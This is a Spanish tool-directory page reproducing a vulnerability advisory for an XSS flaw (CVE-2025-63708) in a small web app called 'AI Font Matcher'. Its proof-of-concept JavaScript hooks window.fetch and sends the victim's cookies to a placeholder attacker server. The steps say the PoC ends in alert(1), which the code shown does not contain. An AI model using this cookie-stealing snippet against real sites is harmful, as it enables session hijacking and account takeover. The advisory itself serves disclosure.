Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-63708 | Kitploit
Herramientas/GitHubGitHub/dylandavis1/cve-2025-63708
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-63708

ID de CVE: CVE-2025-63708
Asignado: 11-12-2025 Tipo de problema: CWE-79 (Cross-Site Scripting)
Producto afectado: "AI Font Matcher" (publicado el 2025-10-10, nid=18425)
Página del producto: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Fecha de descubrimiento: 2025-10-11
Investigador: Dylan Davis

Resumen

La aplicación procesa datos de una solicitud webfonts sin sanitizar los nombres de las familias de fuentes. Un atacante que controle o intercepte esa respuesta puede inyectar JavaScript que se ejecute en el contexto de la página, lo que permite el robo de cookies de sesión y la toma de control de la cuenta.

Impacto

  • Ejecución arbitraria de JavaScript en el navegador de la víctima
  • Exfiltración de cookies de sesión (observé cookies no HttpOnly durante mis pruebas)
  • Secuestro de cuenta y acciones realizadas en nombre del usuario

Versiones afectadas / Alcance

  • El paquete "AI Font Matcher" distribuido en SourceCodester a fecha del 2025-10-10.

Reproducción (PoC)

Este PoC demuestra la ejecución de código interceptando window.fetch y devolviendo un payload controlado de Web Fonts.

  1. Ejecute la aplicación localmente desde el código fuente descargado.
  2. Abra DevTools → Consola y pegue el PoC siguiente (o cargue poc.js).
  3. Active la interfaz que solicita webfonts; observe un alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Descargar herramienta